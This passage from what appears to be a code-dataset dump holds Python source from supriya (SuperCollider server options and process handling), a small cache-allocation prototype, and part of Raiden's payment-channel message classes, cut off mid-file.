\"output_bus_channel_count\", 8)\n if self.input_bus_channel_count < 0:\n raise ValueError(self.input_bus_channel_count)\n if self.output_bus_channel_count < 0:\n raise ValueError(self.output_bus_channel_count)\n if self.audio_bus_channel_count < (\n self.input_bus_channel_count + self.output_bus_channel_count\n ):\n raise ValueError(\"Insufficient audio buses\")\n\n ### CLASS VARIABLES ###\n\n def __repr__(self):\n return uqbar.objects.get_repr(self, multiline=True, suppress_defaults=False)\n\n def __iter__(self):\n return (arg for arg in self.serialize())\n\n ### PUBLIC METHODS ###\n\n def get_audio_bus_ids(self, client_id: int) -> Tuple[int, int]:\n audio_buses_per_client = (\n self.private_audio_bus_channel_count // self.maximum_logins\n )\n minimum = self.first_private_bus_id + (client_id * audio_buses_per_client)\n maximum = self.first_private_bus_id + ((client_id + 1) * audio_buses_per_client)\n return minimum, maximum\n\n def get_buffer_ids(self, client_id: int) -> Tuple[int, int]:\n 
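        # IDs are partitioned into equal contiguous per-client slices.\n        # Worked example: with buffer_count=1024 and maximum_logins=4,\n        # each client owns 1024 // 4 = 256 buffers, so client 1 gets the\n        # half-open range [256, 512).\n        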
buffers_per_client = self.buffer_count // self.maximum_logins\n minimum = client_id * buffers_per_client\n maximum = (client_id + 1) * buffers_per_client\n return minimum, maximum\n\n def get_control_bus_ids(self, client_id: int) -> Tuple[int, int]:\n control_buses_per_client = self.control_bus_channel_count // self.maximum_logins\n minimum = client_id * control_buses_per_client\n maximum = (client_id + 1) * control_buses_per_client\n return minimum, maximum\n\n def get_sync_ids(self, client_id: int) -> Tuple[int, int]:\n return client_id << 26, (client_id + 1) << 26\n\n def serialize(self) -> List[str]:\n result = [str(find(self.executable))]\n pairs: Dict[str, Optional[str]] = {}\n if self.realtime:\n if self.protocol == \"tcp\":\n pairs[\"-t\"] = str(self.port)\n else:\n pairs[\"-u\"] = str(self.port)\n if self.input_device:\n pairs[\"-H\"] = str(self.input_device)\n if self.output_device != self.input_device:\n result.append(str(self.output_device))\n if self.maximum_logins != 64:\n pairs[\"-l\"] = str(self.maximum_logins)\n if self.password:\n pairs[\"-p\"] = str(self.password)\n if self.sample_rate is not None:\n pairs[\"-S\"] = str(self.sample_rate)\n if not self.zero_configuration:\n pairs[\"-R\"] = \"0\"\n if self.audio_bus_channel_count != 1024:\n pairs[\"-a\"] = str(self.audio_bus_channel_count)\n if self.control_bus_channel_count != 16384:\n pairs[\"-c\"] = str(self.control_bus_channel_count)\n if self.input_bus_channel_count != 8:\n pairs[\"-i\"] = str(self.input_bus_channel_count)\n if self.output_bus_channel_count != 8:\n pairs[\"-o\"] = str(self.output_bus_channel_count)\n if self.buffer_count != 1024:\n pairs[\"-b\"] = str(self.buffer_count)\n if self.maximum_node_count != 1024:\n pairs[\"-n\"] = str(self.maximum_node_count)\n if self.maximum_synthdef_count != 1024:\n pairs[\"-d\"] = str(self.maximum_synthdef_count)\n if self.block_size != 64:\n pairs[\"-z\"] = str(self.block_size)\n if self.hardware_buffer_size is not None:\n pairs[\"-Z\"] = str(self.hardware_buffer_size)\n if self.memory_size != 8192:\n pairs[\"-m\"] = str(self.memory_size)\n if self.random_number_generator_count != 64:\n pairs[\"-r\"] = str(self.random_number_generator_count)\n if self.wire_buffer_count != 64:\n pairs[\"-w\"] = str(self.wire_buffer_count)\n if not self.load_synthdefs:\n pairs[\"-D\"] = \"0\"\n if self.input_stream_mask:\n pairs[\"-I\"] = str(self.input_stream_mask)\n if self.output_stream_mask:\n pairs[\"-O\"] = str(self.output_stream_mask)\n if 0 < self.verbosity:\n pairs[\"-v\"] = str(self.verbosity)\n if self.restricted_path is not None:\n pairs[\"-P\"] = str(self.restricted_path)\n if self.memory_locking:\n pairs[\"-L\"] = None\n if self.ugen_plugins_path:\n pairs[\"-U\"] = str(self.ugen_plugins_path)\n if self.threads and find(self.executable).stem == \"supernova\":\n pairs[\"-t\"] = str(self.threads)\n for key, value in sorted(pairs.items()):\n result.extend([key, value] if value is not None else [key])\n return result\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def first_private_bus_id(self):\n return self.output_bus_channel_count + self.input_bus_channel_count\n\n @property\n def private_audio_bus_channel_count(self):\n return (\n self.audio_bus_channel_count\n - self.input_bus_channel_count\n - self.output_bus_channel_count\n )\n\n\ndef find(scsynth_path=None):\n \"\"\"\n Find the ``scsynth`` executable.\n\n The following paths, if defined, will be searched (prioritised as ordered):\n\n 1. The absolute path ``scsynth_path``\n 2. 
The environment variable ``SUPRIYA_SERVER_EXECUTABLE`` (pointing to the `scsynth`\n binary)\n 3. The user's ``PATH``\n 4. Common installation directories of the SuperCollider application.\n\n Returns a path to the ``scsynth`` executable. Raises ``RuntimeError`` if no path is\n found.\n \"\"\"\n path = Path(scsynth_path or os.environ.get(ENVAR_SERVER_EXECUTABLE) or \"scsynth\")\n if path.is_absolute() and uqbar.io.find_executable(str(path)):\n return path\n path_candidates = uqbar.io.find_executable(path.name)\n if path_candidates:\n return Path(path_candidates[0])\n paths = []\n executable = scsynth_path or \"scsynth\"\n if Path(executable).stem == \"supernova\":\n executable = \"supernova\"\n system = platform.system()\n if system == \"Linux\":\n paths.extend(\n [Path(\"/usr/bin/\" + executable), Path(\"/usr/local/bin/\" + executable)]\n )\n elif system == \"Darwin\":\n paths.append(\n Path(\"/Applications/SuperCollider.app/Contents/Resources/\" + executable)\n )\n elif system == \"Windows\":\n paths.extend(\n Path(r\"C:\\Program Files\").glob(r\"SuperCollider*\\\\\" + executable + \".exe\")\n )\n for path in paths:\n if path.exists():\n return path\n raise RuntimeError(\"Failed to locate executable\")\n\n\ndef kill():\n with subprocess.Popen(\n [\"ps\", \"-Af\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n ) as process:\n output = process.stdout.read()\n for line in output.decode().splitlines():\n parts = line.split()\n if not any(part in [\"supernova\", \"scsynth\"] for part in parts):\n continue\n pid = int(parts[1])\n os.kill(pid, signal.SIGKILL)\n\n\nclass LineStatus(enum.IntEnum):\n CONTINUE = 0\n READY = 1\n ERROR = 2\n\n\nclass ProcessProtocol:\n def __init__(self):\n self.is_running = False\n\n def boot(self, options: Options):\n raise NotImplementedError\n\n def quit(self):\n raise NotImplementedError\n\n def _handle_line(self, line):\n if line.startswith(\"late:\"):\n logger.warning(f\"Received: {line}\")\n elif \"error\" in line.lower() or \"exception\" in line.lower():\n logger.error(f\"Received: {line}\")\n else:\n logger.info(f\"Received: {line}\")\n if line.startswith((\"SuperCollider 3 server ready\", \"Supernova ready\")):\n return LineStatus.READY\n elif line.startswith((\"Exception\", \"ERROR\", \"*** ERROR\")):\n return LineStatus.ERROR\n return LineStatus.CONTINUE\n\n\nclass SyncProcessProtocol(ProcessProtocol):\n def __init__(self):\n super().__init__()\n atexit.register(self.quit)\n\n def boot(self, options: Options):\n if self.is_running:\n return\n try:\n logger.info(\"Boot: {}\".format(*options))\n self.process = subprocess.Popen(\n list(options),\n stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE,\n start_new_session=True,\n )\n start_time = time.time()\n timeout = 10\n while True:\n line = self.process.stdout.readline().decode().rstrip() # type: ignore\n if not line:\n continue\n line_status = self._handle_line(line)\n if line_status == LineStatus.READY:\n break\n elif line_status == LineStatus.ERROR:\n raise ServerCannotBoot(line)\n elif (time.time() - start_time) > timeout:\n raise ServerCannotBoot(line)\n self.is_running = True\n except ServerCannotBoot:\n self.process.terminate()\n self.process.wait()\n raise\n\n def quit(self) -> None:\n if not self.is_running:\n return\n self.process.terminate()\n self.process.wait()\n self.is_running = False\n\n\nclass AsyncProcessProtocol(asyncio.SubprocessProtocol, ProcessProtocol):\n ### INITIALIZER ###\n\n def __init__(self):\n ProcessProtocol.__init__(self)\n asyncio.SubprocessProtocol.__init__(self)\n 
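        # boot_future resolves once scsynth/supernova reports readiness (or\n        # fails to boot); exit_future resolves when the process terminates.\n        # Both are replaced with fresh loop-bound futures on every boot().\n        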
self.boot_future = asyncio.Future()\n self.exit_future = asyncio.Future()\n self.error_text = \"\"\n\n ### PUBLIC METHODS ###\n\n async def boot(self, options: Options):\n logger.info(\"Booting ...\")\n if self.is_running:\n logger.info(\"... already booted!\")\n return\n self.is_running = False\n loop = asyncio.get_running_loop()\n self.boot_future = loop.create_future()\n self.exit_future = loop.create_future()\n self.error_text = \"\"\n self.buffer_ = \"\"\n _, _ = await loop.subprocess_exec(\n lambda: self, *options, stdin=None, stderr=None\n )\n if not (await self.boot_future):\n raise ServerCannotBoot(self.error_text)\n\n def connection_made(self, transport):\n logger.info(\"Connection made!\")\n self.is_running = True\n self.transport = transport\n\n def pipe_connection_lost(self, fd, exc):\n logger.info(\"Pipe connection lost!\")\n\n def pipe_data_received(self, fd, data):\n # *nix and OSX return full lines,\n # but Windows will return partial lines\n # which obligates us to reconstruct them.\n text = self.buffer_ + data.decode().replace(\"\\r\\n\", \"\\n\")\n if \"\\n\" in text:\n text, _, self.buffer_ = text.rpartition(\"\\n\")\n for line in text.splitlines():\n line_status = self._handle_line(line)\n if line_status == LineStatus.READY:\n self.boot_future.set_result(True)\n logger.info(\"... booted!\")\n elif line_status == LineStatus.ERROR:\n if not self.boot_future.done():\n self.boot_future.set_result(False)\n self.error_text = line\n logger.info(\"... failed to boot!\")\n else:\n self.buffer_ = text\n\n def process_exited(self):\n logger.info(f\"Process exited with {self.transport.get_returncode()}.\")\n self.is_running = False\n try:\n self.exit_future.set_result(None)\n if not self.boot_future.done():\n self.boot_future.set_result(False)\n except asyncio.exceptions.InvalidStateError:\n pass\n\n async def quit(self):\n logger.info(\"Quitting ...\")\n if not self.is_running:\n logger.info(\"... already quit!\")\n return\n self.is_running = False\n self.transport.close()\n await self.exit_future\n logger.info(\"... 
quit!\")\n\n\nclass AsyncNonrealtimeProcessProtocol(asyncio.SubprocessProtocol):\n def __init__(self, exit_future: asyncio.Future) -> None:\n self.buffer_ = \"\"\n self.exit_future = exit_future\n\n async def run(self, command: List[str], render_directory_path: Path) -> None:\n logger.info(f\"Running: {' '.join(command)}\")\n _, _ = await asyncio.get_running_loop().subprocess_exec(\n lambda: self,\n *command,\n stdin=None,\n stderr=None,\n start_new_session=True,\n cwd=render_directory_path,\n )\n\n def handle_line(self, line: str) -> None:\n logger.debug(f\"Received: {line}\")\n\n def connection_made(self, transport):\n logger.debug(\"Connecting\")\n self.transport = transport\n\n def pipe_data_received(self, fd, data):\n logger.debug(f\"Data: {data}\")\n # *nix and OSX return full lines,\n # but Windows will return partial lines\n # which obligates us to reconstruct them.\n text = self.buffer_ + data.decode().replace(\"\\r\\n\", \"\\n\")\n if \"\\n\" in text:\n text, _, self.buffer_ = text.rpartition(\"\\n\")\n for line in text.splitlines():\n self.handle_line(line)\n else:\n self.buffer_ = text\n\n def process_exited(self):\n logger.debug(f\"Exiting with {self.transport.get_returncode()}\")\n self.exit_future.set_result(self.transport.get_returncode())\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/scsynth.py","file_name":"scsynth.py","file_ext":"py","file_size_in_byte":15426,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"17759254894","text":"from src.server import Server\nfrom typing import List, Dict\nfrom src.utils import find_tail_latency\n\n\"\"\"\n The RobinHood class is responsible to manage all the robinhood functionalities.\n It'll contain info for all servers who are associated with this instance. 
\n\"\"\"\n\n\nclass RobinHood:\n def __init__(self, cache_memory_limit: int, server_list: List[Server]):\n self.cache_memory_limit = cache_memory_limit\n self.cache_memory_used = 0\n self.server_list = server_list\n self.server_map: Dict[str, Server] = {}\n self.overall_tail_latency = 0\n\n avg_cache_hit_ratio = 100/len(server_list)\n \n for server in server_list:\n self.server_map[server.server_name] = server\n server.cache_hit_percentage = avg_cache_hit_ratio\n self.current_cache_allocation()\n \n def add_server_latency(self, server_name, new_latency):\n print(f\"add_server_latency for {server_name} with {new_latency}\")\n if server_name not in self.server_map:\n raise Exception(\"Invalid server name provided\")\n \n server = self.server_map[server_name]\n server.add_latency(new_latency)\n self.reallocate_cache()\n self.current_tail_latencies()\n \n def reallocate_cache(self):\n print(f\"reallocate_cache for robinhood cluster\")\n min_latency_server = None\n max_latency_server = None\n \n for server in self.server_list:\n if min_latency_server is None:\n min_latency_server = server\n \n if server.tail_latency < min_latency_server.tail_latency:\n min_latency_server = server\n\n if max_latency_server is None:\n max_latency_server = server\n \n if server.tail_latency > max_latency_server.tail_latency:\n max_latency_server = server\n\n allocate_amount = min_latency_server.cache_hit_percentage/2\n\n max_latency_server.cache_hit_percentage += allocate_amount\n min_latency_server.cache_hit_percentage -= allocate_amount\n self.find_overall_tail_latency()\n self.current_cache_allocation()\n \n def current_cache_allocation(self):\n cache_hit_list = [server.cache_hit_percentage for server in self.server_list]\n print(f\"Current cache_hit_list: {cache_hit_list}\")\n \n def current_tail_latencies(self):\n tail_latencies = [server.tail_latency for server in self.server_list]\n print(f\"Current tail_latencies: {tail_latencies}\")\n\n def find_overall_tail_latency(self):\n latency_list = [server.tail_latency for server in self.server_list]\n self.overall_tail_latency = find_tail_latency(latency_list)\n print(f\"Current overall_tail_latency: {self.overall_tail_latency}\")\n ","repo_name":"SadiaZahin/smart-cache-prototype","sub_path":"src/robinhood.py","file_name":"robinhood.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27337325444","text":"from dataclasses import dataclass, field\nfrom operator import attrgetter\n\nfrom cachetools import LRUCache, cached\nfrom eth_utils import big_endian_to_int\n\nfrom raiden.constants import EMPTY_SIGNATURE, UINT64_MAX, UINT256_MAX\nfrom raiden.encoding import messages\nfrom raiden.encoding.format import buffer_for\nfrom raiden.exceptions import InvalidProtocolMessage, InvalidSignature\nfrom raiden.storage.serialization import DictSerializer\nfrom raiden.transfer import channel\nfrom raiden.transfer.architecture import SendMessageEvent\nfrom raiden.transfer.balance_proof import (\n pack_balance_proof,\n pack_balance_proof_update,\n pack_reward_proof,\n)\nfrom raiden.transfer.events import SendProcessed\nfrom raiden.transfer.identifiers import CanonicalIdentifier\nfrom raiden.transfer.mediated_transfer.events import (\n SendBalanceProof,\n SendLockedTransfer,\n SendLockExpired,\n SendRefundTransfer,\n SendSecretRequest,\n SendSecretReveal,\n)\nfrom raiden.transfer.mediated_transfer.state import LockedTransferSignedState\nfrom raiden.transfer.state import (\n 
BalanceProofSignedState,\n HashTimeLockState,\n NettingChannelState,\n balanceproof_from_envelope,\n)\nfrom raiden.transfer.utils import hash_balance_data\nfrom raiden.utils import ishash, pex, sha3\nfrom raiden.utils.signer import Signer, recover\nfrom raiden.utils.typing import (\n MYPY_ANNOTATION,\n AdditionalHash,\n Address,\n BalanceHash,\n BlockExpiration,\n ChainID,\n ChannelID,\n ClassVar,\n Dict,\n FeeAmount,\n InitiatorAddress,\n Locksroot,\n MessageID,\n Nonce,\n Optional,\n PaymentAmount,\n PaymentID,\n PaymentWithFeeAmount,\n RaidenProtocolVersion,\n Secret,\n SecretHash,\n Signature,\n TargetAddress,\n TokenAddress,\n TokenAmount,\n TokenNetworkAddress,\n Type,\n)\n\n__all__ = (\n \"Delivered\",\n \"EnvelopeMessage\",\n \"Lock\",\n \"LockedTransfer\",\n \"LockedTransferBase\",\n \"LockExpired\",\n \"Message\",\n \"Ping\",\n \"Pong\",\n \"Processed\",\n \"RefundTransfer\",\n \"RequestMonitoring\",\n \"RevealSecret\",\n \"SecretRequest\",\n \"SignedBlindedBalanceProof\",\n \"SignedMessage\",\n \"ToDevice\",\n \"Unlock\",\n \"UpdatePFS\",\n \"decode\",\n \"from_dict\",\n \"message_from_sendevent\",\n)\n\n\n_senders_cache = LRUCache(maxsize=128)\n_hashes_cache = LRUCache(maxsize=128)\n_lock_bytes_cache = LRUCache(maxsize=128)\n\n\ndef assert_envelope_values(\n nonce: int,\n channel_identifier: ChannelID,\n transferred_amount: TokenAmount,\n locked_amount: TokenAmount,\n locksroot: Locksroot,\n):\n if nonce <= 0:\n raise ValueError(\"nonce cannot be zero or negative\")\n\n if nonce > UINT64_MAX:\n raise ValueError(\"nonce is too large\")\n\n if channel_identifier < 0:\n raise ValueError(\"channel id cannot be negative\")\n\n if channel_identifier > UINT256_MAX:\n raise ValueError(\"channel id is too large\")\n\n if transferred_amount < 0:\n raise ValueError(\"transferred_amount cannot be negative\")\n\n if transferred_amount > UINT256_MAX:\n raise ValueError(\"transferred_amount is too large\")\n\n if locked_amount < 0:\n raise ValueError(\"locked_amount cannot be negative\")\n\n if locked_amount > UINT256_MAX:\n raise ValueError(\"locked_amount is too large\")\n\n if len(locksroot) != 32:\n raise ValueError(\"locksroot must have length 32\")\n\n\ndef assert_transfer_values(payment_identifier, token, recipient):\n if payment_identifier < 0:\n raise ValueError(\"payment_identifier cannot be negative\")\n\n if payment_identifier > UINT64_MAX:\n raise ValueError(\"payment_identifier is too large\")\n\n if len(token) != 20:\n raise ValueError(\"token is an invalid address\")\n\n if len(recipient) != 20:\n raise ValueError(\"recipient is an invalid address\")\n\n\ndef decode(data: bytes) -> \"Message\":\n try:\n klass = CMDID_TO_CLASS[data[0]]\n except KeyError:\n raise InvalidProtocolMessage(\"Invalid message type (CMDID = {})\".format(hex(data[0])))\n return klass.decode(data)\n\n\ndef from_dict(data: dict) -> \"Message\":\n try:\n CLASSNAME_TO_CLASS[data[\"type\"]]\n except KeyError:\n if \"type\" in data:\n raise InvalidProtocolMessage(\n 'Invalid message type (data[\"type\"] = {})'.format(data[\"type\"])\n ) from None\n else:\n raise InvalidProtocolMessage(\n \"Invalid message data. 
Can not find the data type\"\n ) from None\n return DictSerializer.serialize(data)\n\n\ndef message_from_sendevent(send_event: SendMessageEvent) -> \"Message\":\n if type(send_event) == SendLockedTransfer:\n assert isinstance(send_event, SendLockedTransfer), MYPY_ANNOTATION\n message = LockedTransfer.from_event(send_event)\n elif type(send_event) == SendSecretReveal:\n assert isinstance(send_event, SendSecretReveal), MYPY_ANNOTATION\n message = RevealSecret.from_event(send_event)\n elif type(send_event) == SendBalanceProof:\n assert isinstance(send_event, SendBalanceProof), MYPY_ANNOTATION\n message = Unlock.from_event(send_event)\n elif type(send_event) == SendSecretRequest:\n assert isinstance(send_event, SendSecretRequest), MYPY_ANNOTATION\n message = SecretRequest.from_event(send_event)\n elif type(send_event) == SendRefundTransfer:\n assert isinstance(send_event, SendRefundTransfer), MYPY_ANNOTATION\n message = RefundTransfer.from_event(send_event)\n elif type(send_event) == SendLockExpired:\n assert isinstance(send_event, SendLockExpired), MYPY_ANNOTATION\n message = LockExpired.from_event(send_event)\n elif type(send_event) == SendProcessed:\n assert isinstance(send_event, SendProcessed), MYPY_ANNOTATION\n message = Processed.from_event(send_event)\n else:\n raise ValueError(f\"Unknown event type {send_event}\")\n\n return message\n\n\n@dataclass(repr=False, eq=False)\nclass Message:\n # Needs to be set by a subclass\n cmdid: ClassVar[int]\n\n def __eq__(self, other):\n return isinstance(other, self.__class__) and self.hash == other.hash\n\n def __hash__(self):\n return big_endian_to_int(self.hash)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return \"<{klass} [msghash={msghash}]>\".format(\n klass=self.__class__.__name__, msghash=pex(self.hash)\n )\n\n @property\n def hash(self):\n packed = self.packed()\n return sha3(packed.data)\n\n @classmethod\n def decode(cls, data):\n packed = messages.wrap(data)\n return cls.unpack(packed)\n\n def encode(self) -> bytes:\n packed = self.packed()\n return bytes(packed.data)\n\n def packed(self):\n klass = messages.CMDID_MESSAGE[self.cmdid]\n data = buffer_for(klass)\n data[0] = self.cmdid\n packed = klass(data)\n self.pack(packed)\n\n return packed\n\n @classmethod\n def unpack(cls, packed):\n raise NotImplementedError(\"Method needs to be implemented in a subclass.\")\n\n def pack(self, packed) -> None:\n raise NotImplementedError(\"Method needs to be implemented in a subclass.\")\n\n\n@dataclass(repr=False, eq=False)\nclass AuthenticatedMessage(Message):\n \"\"\" Message, that has a sender. \"\"\"\n\n def sender(self) -> Address:\n raise NotImplementedError(\"Property needs to be implemented in subclass.\")\n\n\n@dataclass(repr=False, eq=False)\nclass SignedMessage(AuthenticatedMessage):\n # signing is a bit problematic, we need to pack the data to sign, but the\n # current API assumes that signing is called before, this can be improved\n # by changing the order to packing then signing\n signature: Signature\n\n def _data_to_sign(self) -> bytes:\n \"\"\" Return the binary data to be/which was signed \"\"\"\n packed = self.packed()\n\n field = type(packed).fields_spec[-1]\n assert field.name == \"signature\", \"signature is not the last field\"\n\n # this slice must be from the end of the buffer\n return packed.data[: -field.size_bytes]\n\n def sign(self, signer: Signer):\n \"\"\" Sign message using signer. 
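        The signed payload is the packed message minus its trailing\n        signature field, as produced by _data_to_sign() above.\n        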
\"\"\"\n message_data = self._data_to_sign()\n self.signature = signer.sign(data=message_data)\n\n @property # type: ignore\n @cached(_senders_cache, key=attrgetter(\"signature\"))\n def sender(self) -> Optional[Address]:\n if not self.signature:\n return None\n data_that_was_signed = self._data_to_sign()\n message_signature = self.signature\n\n try:\n address: Optional[Address] = recover(\n data=data_that_was_signed, signature=message_signature\n )\n except InvalidSignature:\n address = None\n return address\n\n @classmethod\n def decode(cls, data):\n packed = messages.wrap(data)\n\n if packed is None:\n return None\n\n return cls.unpack(packed)\n\n\n@dataclass(repr=False, eq=False)\nclass RetrieableMessage:\n \"\"\" Message, that supports a retry-queue. \"\"\"\n\n message_identifier: MessageID\n\n\n@dataclass(repr=False, eq=False)\nclass SignedRetrieableMessage(SignedMessage, RetrieableMessage):\n \"\"\" Mixin of SignedMessage and RetrieableMessage. \"\"\"\n\n pass\n\n\n@dataclass(repr=False, eq=False)\nclass EnvelopeMessage(SignedRetrieableMessage):\n chain_id: ChainID\n nonce: Nonce\n transferred_amount: TokenAmount\n locked_amount: TokenAmount\n locksroot: Locksroot\n channel_identifier: ChannelID\n token_network_address: TokenNetworkAddress\n\n def __post_init__(self):\n assert_envelope_values(\n self.nonce,\n self.channel_identifier,\n self.transferred_amount,\n self.locked_amount,\n self.locksroot,\n )\n\n @property\n def message_hash(self):\n packed = self.packed()\n klass = type(packed)\n\n field = klass.fields_spec[-1]\n assert field.name == \"signature\", \"signature is not the last field\"\n\n data = packed.data\n message_data = data[: -field.size_bytes]\n message_hash = sha3(message_data)\n\n return message_hash\n\n def _data_to_sign(self) -> bytes:\n balance_hash = hash_balance_data(\n self.transferred_amount, self.locked_amount, self.locksroot\n )\n balance_proof_packed = pack_balance_proof(\n nonce=self.nonce,\n balance_hash=balance_hash,\n additional_hash=self.message_hash,\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.chain_id,\n token_network_address=self.token_network_address,\n channel_identifier=self.channel_identifier,\n ),\n )\n return balance_proof_packed\n\n\n@dataclass(repr=False, eq=False)\nclass Processed(SignedRetrieableMessage):\n \"\"\" All accepted messages should be confirmed by a `Processed` message which echoes the\n orginals Message hash.\n \"\"\"\n\n # FIXME: Processed should _not_ be SignedRetrieableMessage, but only SignedMessage\n cmdid: ClassVar[int] = messages.PROCESSED\n\n message_identifier: MessageID\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n processed = cls(message_identifier=packed.message_identifier, signature=packed.signature)\n return processed\n\n def pack(self, packed) -> None:\n packed.message_identifier = self.message_identifier\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n return cls(message_identifier=event.message_identifier, signature=EMPTY_SIGNATURE)\n\n\n@dataclass(repr=False, eq=False)\nclass ToDevice(SignedMessage):\n \"\"\"\n Message, which can be directly sent to all devices of a node known by matrix,\n no room required. 
Messages which are supposed to be sent via transport.sent_to_device must\n subclass.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.TODEVICE\n\n message_identifier: MessageID\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n to_device = cls(message_identifier=packed.message_identifier, signature=packed.signature)\n return to_device\n\n def pack(self, packed) -> None:\n packed.message_identifier = self.message_identifier\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass Delivered(SignedMessage):\n \"\"\" Message used to inform the partner node that a message was received *and*\n persisted.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.DELIVERED\n\n delivered_message_identifier: MessageID\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n delivered = cls(\n delivered_message_identifier=packed.delivered_message_identifier,\n signature=packed.signature,\n )\n return delivered\n\n def pack(self, packed) -> None:\n packed.delivered_message_identifier = self.delivered_message_identifier\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass Pong(SignedMessage):\n \"\"\" Response to a Ping message. \"\"\"\n\n cmdid: ClassVar[int] = messages.PONG\n\n nonce: Nonce\n\n @staticmethod\n def unpack(packed):\n pong = Pong(nonce=packed.nonce, signature=packed.signature)\n return pong\n\n def pack(self, packed) -> None:\n packed.nonce = self.nonce\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass Ping(SignedMessage):\n \"\"\" Healthcheck message. \"\"\"\n\n cmdid: ClassVar[int] = messages.PING\n\n nonce: Nonce\n current_protocol_version: RaidenProtocolVersion\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n ping = cls(\n nonce=packed.nonce,\n current_protocol_version=packed.current_protocol_version,\n signature=packed.signature,\n )\n return ping\n\n def pack(self, packed) -> None:\n packed.nonce = self.nonce\n packed.current_protocol_version = self.current_protocol_version\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass SecretRequest(SignedRetrieableMessage):\n \"\"\" Requests the secret which unlocks a secrethash. 
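\n    Example construction (editor's sketch; the field values below are\n    placeholders, not protocol constants):\n\n        SecretRequest(\n            message_identifier=MessageID(1),\n            payment_identifier=PaymentID(1),\n            secrethash=SecretHash(sha3(b'secret')),\n            amount=PaymentAmount(10),\n            expiration=BlockExpiration(50),\n            signature=EMPTY_SIGNATURE,\n        )\n    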
\"\"\"\n\n cmdid: ClassVar[int] = messages.SECRETREQUEST\n\n payment_identifier: PaymentID\n secrethash: SecretHash\n amount: PaymentAmount\n expiration: BlockExpiration\n\n @classmethod\n def unpack(cls, packed):\n secret_request = cls(\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n secrethash=packed.secrethash,\n amount=packed.amount,\n expiration=packed.expiration,\n signature=packed.signature,\n )\n return secret_request\n\n def pack(self, packed) -> None:\n packed.message_identifier = self.message_identifier\n packed.payment_identifier = self.payment_identifier\n packed.secrethash = self.secrethash\n packed.amount = self.amount\n packed.expiration = self.expiration\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n # pylint: disable=unexpected-keyword-arg\n return cls(\n message_identifier=event.message_identifier,\n payment_identifier=event.payment_identifier,\n secrethash=event.secrethash,\n amount=event.amount,\n expiration=event.expiration,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass Unlock(EnvelopeMessage):\n \"\"\" Message used to do state changes on a partner Raiden Channel.\n\n Locksroot changes need to be synchronized among both participants, the\n protocol is for only the side unlocking to send the Unlock message allowing\n the other party to claim the unlocked lock.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.UNLOCK\n\n payment_identifier: PaymentID\n secret: Secret = field(repr=False)\n\n def __post_init__(self):\n super().__post_init__()\n if self.payment_identifier < 0:\n raise ValueError(\"payment_identifier cannot be negative\")\n\n if self.payment_identifier > UINT64_MAX:\n raise ValueError(\"payment_identifier is too large\")\n\n if len(self.secret) != 32:\n raise ValueError(\"secret must have 32 bytes\")\n\n @property # type: ignore\n @cached(_hashes_cache, key=attrgetter(\"secret\"))\n def secrethash(self):\n return sha3(self.secret)\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n secret = cls(\n chain_id=packed.chain_id,\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n nonce=packed.nonce,\n token_network_address=packed.token_network_address,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n locked_amount=packed.locked_amount,\n locksroot=packed.locksroot,\n secret=packed.secret,\n signature=packed.signature,\n )\n return secret\n\n def pack(self, packed) -> None:\n packed.chain_id = self.chain_id\n packed.message_identifier = self.message_identifier\n packed.payment_identifier = self.payment_identifier\n packed.nonce = self.nonce\n packed.token_network_address = self.token_network_address\n packed.channel_identifier = self.channel_identifier\n packed.transferred_amount = self.transferred_amount\n packed.locked_amount = self.locked_amount\n packed.locksroot = self.locksroot\n packed.secret = self.secret\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n balance_proof = event.balance_proof\n # pylint: disable=unexpected-keyword-arg\n return cls(\n chain_id=balance_proof.chain_id,\n message_identifier=event.message_identifier,\n payment_identifier=event.payment_identifier,\n nonce=balance_proof.nonce,\n token_network_address=balance_proof.token_network_address,\n channel_identifier=balance_proof.channel_identifier,\n transferred_amount=balance_proof.transferred_amount,\n 
